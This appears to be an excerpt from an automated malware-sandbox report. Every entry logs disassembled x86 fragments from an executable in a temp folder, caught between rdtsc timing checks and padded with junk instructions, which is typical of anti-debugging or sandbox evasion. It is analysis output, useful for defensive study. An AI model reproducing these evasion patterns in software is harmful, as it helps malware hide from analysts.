                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 8526BA second address: 852727 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD81D0C8436h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push edi 0x0000000d call 00007FD81D0C8428h 0x00000012 pop edi 0x00000013 mov dword ptr [esp+04h], edi 0x00000017 add dword ptr [esp+04h], 0000001Ah 0x0000001f inc edi 0x00000020 push edi 0x00000021 ret 0x00000022 pop edi 0x00000023 ret 0x00000024 mov di, 0FFFh 0x00000028 jnc 00007FD81D0C842Ch 0x0000002e or dword ptr [ebp+12454279h], esi 0x00000034 push 00000000h 0x00000036 mov edi, dword ptr [ebp+122D17BEh] 0x0000003c mov ebx, dword ptr [ebp+12456B05h] 0x00000042 push 00000000h 0x00000044 mov bx, E505h 0x00000048 xchg eax, esi 0x00000049 push edi 0x0000004a push eax 0x0000004b push edx 0x0000004c push eax 0x0000004d push edx 0x0000004e rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 851977 second address: 851A0E instructions: 0x00000000 rdtsc 0x00000002 ja 00007FD81C888258h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b sub dword ptr [ebp+122D22D8h], edi 0x00000011 push dword ptr fs:[00000000h] 0x00000018 push 00000000h 0x0000001a push ebx 0x0000001b call 00007FD81C888258h 0x00000020 pop ebx 0x00000021 mov dword ptr [esp+04h], ebx 0x00000025 add dword ptr [esp+04h], 00000017h 0x0000002d inc ebx 0x0000002e push ebx 0x0000002f ret 0x00000030 pop ebx 0x00000031 ret 0x00000032 mov edi, dword ptr [ebp+12456AD3h] 0x00000038 mov dword ptr fs:[00000000h], esp 0x0000003f mov edi, ecx 0x00000041 mov eax, dword ptr [ebp+122D0655h] 0x00000047 mov edi, dword ptr [ebp+12483716h] 0x0000004d push FFFFFFFFh 0x0000004f push 00000000h 0x00000051 push ebp 0x00000052 call 00007FD81C888258h 0x00000057 pop ebp 0x00000058 mov dword ptr [esp+04h], ebp 0x0000005c add dword ptr [esp+04h], 0000001Ah 0x00000064 inc ebp 0x00000065 push ebp 0x00000066 ret 0x00000067 pop ebp 0x00000068 ret 0x00000069 jl 00007FD81C88825Dh 0x0000006f push ecx 0x00000070 mov edi, 6D8886EFh 0x00000075 pop edi 0x00000076 nop 0x00000077 pushad 0x00000078 pushad 0x00000079 jmp 00007FD81C88825Dh 0x0000007e push eax 0x0000007f push edx 0x00000080 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 852727 second address: 85272B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 851A0E second address: 851A1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jnl 00007FD81C888256h 0x0000000d rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 85272B second address: 852746 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD81D0C842Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edi 0x0000000a push eax 0x0000000b jg 00007FD81D0C8438h 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 852746 second address: 85274A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 85274A second address: 85274E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 8548F2 second address: 854906 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FD81C88825Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 854F22 second address: 854F30 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 js 00007FD81D0C842Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 855DD1 second address: 855DD5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 855DD5 second address: 855DDB instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 855DDB second address: 855DE1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 855DE1 second address: 855DE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 855DE5 second address: 855DE9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 857F0C second address: 857F2C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 pushad 0x00000008 jmp 00007FD81D0C8433h 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 858F72 second address: 858F97 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FD81C888258h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FD81C888266h 0x00000012 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 858F97 second address: 858F9D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 85706A second address: 857070 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 857070 second address: 857075 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 857110 second address: 857136 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 jmp 00007FD81C888264h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edi 0x0000000f js 00007FD81C88825Ch 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 86128A second address: 8612A0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FD81D0C8431h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 7FB364 second address: 7FB368 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 86ABBB second address: 86ABCD instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jp 00007FD81D0C842Ah 0x0000000e rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 7F97CD second address: 7F97D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 7F97D1 second address: 7F97EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD81D0C8433h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 86FF99 second address: 86FF9F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 8700F0 second address: 8700FA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007FD81D0C8426h 0x0000000a rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 8701EC second address: 8701FD instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 8701FD second address: 870201 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 870201 second address: 870207 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 870207 second address: 87021A instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FD81D0C8428h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [eax] 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 87021A second address: 870251 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FD81C888256h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jmp 00007FD81C888268h 0x00000010 jnp 00007FD81C888256h 0x00000016 popad 0x00000017 popad 0x00000018 mov dword ptr [esp+04h], eax 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f pushad 0x00000020 popad 0x00000021 pushad 0x00000022 popad 0x00000023 popad 0x00000024 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 870251 second address: 692B2E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FD81D0C8437h 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pop eax 0x0000000e stc 0x0000000f push dword ptr [ebp+122D140Dh] 0x00000015 pushad 0x00000016 mov bx, dx 0x00000019 mov eax, 71707773h 0x0000001e popad 0x0000001f call dword ptr [ebp+122D188Eh] 0x00000025 pushad 0x00000026 cld 0x00000027 xor eax, eax 0x00000029 pushad 0x0000002a jne 00007FD81D0C842Ch 0x00000030 xor dword ptr [ebp+122D232Bh], ebx 0x00000036 mov ebx, dword ptr [ebp+122D28D3h] 0x0000003c popad 0x0000003d mov edx, dword ptr [esp+28h] 0x00000041 jl 00007FD81D0C842Ch 0x00000047 mov dword ptr [ebp+122D2973h], eax 0x0000004d sub dword ptr [ebp+122D26DCh], esi 0x00000053 mov esi, 0000003Ch 0x00000058 mov dword ptr [ebp+122D26DCh], ebx 0x0000005e add esi, dword ptr [esp+24h] 0x00000062 add dword ptr [ebp+122D270Bh], edx 0x00000068 lodsw 0x0000006a stc 0x0000006b add eax, dword ptr [esp+24h] 0x0000006f jmp 00007FD81D0C842Eh 0x00000074 mov ebx, dword ptr [esp+24h] 0x00000078 stc 0x00000079 jng 00007FD81D0C8427h 0x0000007f stc 0x00000080 nop 0x00000081 push eax 0x00000082 push edx 0x00000083 push eax 0x00000084 push edx 0x00000085 push esi 0x00000086 pop esi 0x00000087 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 874DA2 second address: 874DA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 801E1D second address: 801E3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FD81D0C8426h 0x0000000a jmp 00007FD81D0C842Eh 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 jbe 00007FD81D0C8426h 0x00000018 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 801E3E second address: 801E42 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 873AEC second address: 873AF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 8746AC second address: 8746B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop esi 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 8746B7 second address: 8746C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD81D0C842Ah 0x00000009 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 8746C5 second address: 8746E3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD81C888261h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c jl 00007FD81C888256h 0x00000012 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 874992 second address: 8749A1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FD81D0C842Ah 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 874B0C second address: 874B16 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FD81C88825Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 874C74 second address: 874C78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 8765C1 second address: 8765C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 8765C5 second address: 8765C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 8765C9 second address: 8765E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FD81C888256h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007FD81C888264h 0x00000011 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 879880 second address: 8798A0 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b push edi 0x0000000c pop edi 0x0000000d jmp 00007FD81D0C842Eh 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 8798A0 second address: 8798A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 8798A6 second address: 8798AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 8798AA second address: 8798AE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 87EA05 second address: 87EA18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 pop edx 0x00000008 jne 00007FD81D0C843Eh 0x0000000e push edi 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 87EA18 second address: 87EA21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 push edi 0x00000008 pop edi 0x00000009 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 87EB59 second address: 87EB5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 87F0FC second address: 87F13B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push esi 0x00000006 jmp 00007FD81C888266h 0x0000000b js 00007FD81C888256h 0x00000011 pop esi 0x00000012 jl 00007FD81C888271h 0x00000018 push ecx 0x00000019 jmp 00007FD81C88825Bh 0x0000001e push edi 0x0000001f pop edi 0x00000020 pop ecx 0x00000021 pushad 0x00000022 pushad 0x00000023 popad 0x00000024 pushad 0x00000025 popad 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 87F95F second address: 87F975 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FD81D0C8432h 0x0000000a rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 87F975 second address: 87F97D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 87F97D second address: 87F981 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 87F981 second address: 87F9E0 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jmp 00007FD81C88825Dh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e pushad 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 pushad 0x00000012 popad 0x00000013 jmp 00007FD81C888269h 0x00000018 jo 00007FD81C888256h 0x0000001e popad 0x0000001f push eax 0x00000020 jmp 00007FD81C888264h 0x00000025 jmp 00007FD81C88825Ah 0x0000002a pop eax 0x0000002b push eax 0x0000002c push edx 0x0000002d push eax 0x0000002e push edx 0x0000002f rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 87F9E0 second address: 87F9E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 87E2DB second address: 87E2E6 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 88463B second address: 88463F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 88463F second address: 884651 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 je 00007FD81C88825Ch 0x0000000c jne 00007FD81C888256h 0x00000012 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 884651 second address: 884658 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 884658 second address: 884660 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 805593 second address: 805597 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 805597 second address: 8055AC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD81C888261h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 84D445 second address: 829BA9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 mov dword ptr [esp], eax 0x0000000a mov dword ptr [ebp+122D1ED2h], ebx 0x00000010 lea eax, dword ptr [ebp+1248E1CCh] 0x00000016 or di, BFB7h 0x0000001b jns 00007FD81D0C8432h 0x00000021 ja 00007FD81D0C842Ch 0x00000027 nop 0x00000028 push edx 0x00000029 push edx 0x0000002a pushad 0x0000002b popad 0x0000002c pop edx 0x0000002d pop edx 0x0000002e push eax 0x0000002f pushad 0x00000030 jmp 00007FD81D0C842Dh 0x00000035 push ebx 0x00000036 push ecx 0x00000037 pop ecx 0x00000038 pop ebx 0x00000039 popad 0x0000003a nop 0x0000003b mov ecx, ebx 0x0000003d call dword ptr [ebp+124542E4h] 0x00000043 push eax 0x00000044 push eax 0x00000045 push edx 0x00000046 push edx 0x00000047 pop edx 0x00000048 push esi 0x00000049 pop esi 0x0000004a rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 84DA0C second address: 84DA12 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 84DAD3 second address: 84DAD7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 84DAD7 second address: 84DAF7 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b push edx 0x0000000c pop edx 0x0000000d jmp 00007FD81C888262h 0x00000012 popad 0x00000013 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 84DAF7 second address: 84DAFD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 84DAFD second address: 84DB01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
